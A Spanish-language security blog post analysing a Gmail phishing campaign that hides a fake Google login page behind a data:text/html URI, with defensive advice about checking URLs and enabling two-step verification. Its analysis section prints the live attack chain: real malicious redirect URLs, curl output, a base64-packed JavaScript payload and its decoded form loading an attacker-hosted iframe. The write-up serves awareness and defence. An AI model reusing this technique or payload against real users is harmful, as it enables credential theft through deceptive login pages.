Técnica de Phishing sobre Gmail
El último intento de phishing que se está distribuyendo en Gmail imita de forma tan exacta la página de correo de Google que los expertos en seguridad han hecho saltar todas las alarmas.Si durante estos días recibes un correo electrónico con un archivo PDF adjunto que, tras pulsarlo, te redirige al inicio de sesión de Google, bajo ningún concepto introduzcas tus datos. Aunque la URL parezca confiable, no lo es. El método es usar Data Uri en la barra de direcciones del navegador para que no muestra ningún error de certificado SSL/TLS y aparezca el subdominio accounts.google.com en la barra aunque no sea seguido de https.
En una nueva campaña del llamado phishing, un grupo de hackers ha comenzado a distribuir un correo electrónico infectado cuya única intención pasa por robar las cuentas de Gmail de las víctimas. El correo esconde una imagen que a primera vista parece un archivo adjunto, pero cuando el usuario pulsa sobre el fichero es automáticamente redirigido a una página que simula el aspecto del inicio de sesión de Gmail.
Por supuesto, la página a la que redirige el correo es una completa y total estafa. El aspecto de la página es idéntico al que tiene la web oficial para iniciar sesión en Gmail, pero a poco que nos fijemos en la barra de dirección URL veremos que antes del enlace de accounts.google.com aparece el texto de “data:text/html,“. Si vemos eso, significa que estamos a punto de caer en el robo de la cuenta.
data:text/html,https://accounts/google.com
Entonces, ¿cómo protegernos de esta nueva estafa? Tan sencillo como revisar muy bien la página en la que introducimos nuestro correo electrónico, y no dejarnos llevar nunca solamente por la interfaz. Hay que revisar siempre la URL de la página en la que se está iniciando sesión, y en todos los casos hay que comprobar que se trate de una web que tiene el certificado HTTPS.
En todos estos ataques, lo que normalmente ocasiona el robo de las cuentas es la falta de seguridad por parte de los usuarios. Tanto esta campaña de robo de cuentas de Gmail como muchas otras que inevitablemente irán llegando en los próximos meses se pueden evitar por completo añadiendo los ajustes de seguridad que recomienda Google, especialmente el referido a la verificación en dos pasos.
Como se puede ver en la parte izquierda de la barra de localización del navegador, en lugar de “https”, tiene “data: text / html” seguido del habitual “https: //accounts.google.com …”. Si no estás prestando mucha atención, ignorarás el preámbulo ‘data: text / html’ y asumirás que la URL es segura.
La URL correcta debe ser:
Análisis del Phishing
Recibes un adjunto con un supuesto PDF:
Para abrirlo aparece que tienes que iniciar sesión en Google:
La falsa imagen del adjunto está enlazada a: http://x5.to/A78
ƒ curl -vvvv http://x5.to/A78 * Trying 112.78.125.184... * Connected to x5.to (112.78.125.184) port 80 (#0) > GET /A78 HTTP/1.1 > Host: x5.to > User-Agent: curl/7.43.0 > Accept: */* > < HTTP/1.1 301 Moved Permanently < Date: Fri, 11 Mar 2016 11:38:08 GMT < Server: Apache/2.2.31 < Location: http://bowlanreedesntal.top/services/aboutus.htm
El error 301 redirecciona a un meta tag de refresco para poner la página del data/url usando una codificación en base64 , usando data/text:html
en la URL:
ƒ curl http://bowlanreedesntal.top/services/aboutus.htm <meta http-equiv="Refresh" content="0; url=data:text/html, https://accounts.google.com/ServiceLogin?service=mail src="data:text/html;base64,ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7d2hpbGUoYy0tKXtpZihrW2NdKXtwPXAucmVwbGFj</span"> ZShuZXcgUmVnRXhwKCdcXGInK2MrJ1xcYicsJ2cnKSxrW2NdKX19cmV0dXJuIHB9KCczLjIuMTg9 IjE3IDE2IDE5IDIwIDIyIjsyMXsoMTUoKXsxNCAxPTMuMi45KFwnMVwnKTsxLjg9XCc3LzEwLTRc JzsxLjExPVwnMTMgNFwnOzEuMjM9XCdcJzsyLjI0KFwnMzZcJylbMF0uMzUoMSl9KCkpfTM3KDM4 KXt9My4yLjMzLjMyPSI8NiAyNz1cXCIyNjovLzI1LjI4LzI5LzMxLjMwXFwiIDM5PVxcIjQwOiAw OzM0OiA1JTsxMjo1JVxcIj48LzY+IjsnLDEwLDQxLCd8bGlua3xkb2N1bWVudHx3aW5kb3d8aWNv bnwxMDB8aWZyYW1lfGltYWdlfHR5cGV8Y3JlYXRlRWxlbWVudHx4fHJlbHxoZWlnaHR8c2hvcnRj dXR8dmFyfGZ1bmN0aW9ufGhhdmV8WW91fHRpdGxlfGJlZW58U2lnbmVkfHRyeXxvdXR8aHJlZnxn ZXRFbGVtZW50c0J5VGFnTmFtZXxib3dsYW5yZWVkZXNudGFsfGh0dHB8c3JjfHRvcHxzZXJ2aWNl c3xodG1sfGNvbnRhY3R1c3xvdXRlckhUTUx8Ym9keXx3aWR0aHxhcHBlbmRDaGlsZHxoZWFkfGNh dGNofGV8c3R5bGV8Ym9yZGVyJy5zcGxpdCgnfCcpKSkK>"
El código Base64 resulta ser código JavaScript:
window.document.title = "You have been Signed out";
try {
(function() {
var link = window.document.createElement('link');
link.type = 'image/x-icon';
link.rel = 'shortcut icon';
link.href = '';
document.getElementsByTagName('head')[0].appendChild(link)
}())
} catch (e) {}
window.document.body.outerHTML = "iframe src=\"http://bowlanreedesntal.top/services/
contactus.html\" style=\"border: 0;width: 100%;height:100%\">/iframe>";
Con el resultado final de la carga de un iframe
La entrada Técnica de Phishing sobre Gmail aparece primero en EnHacke.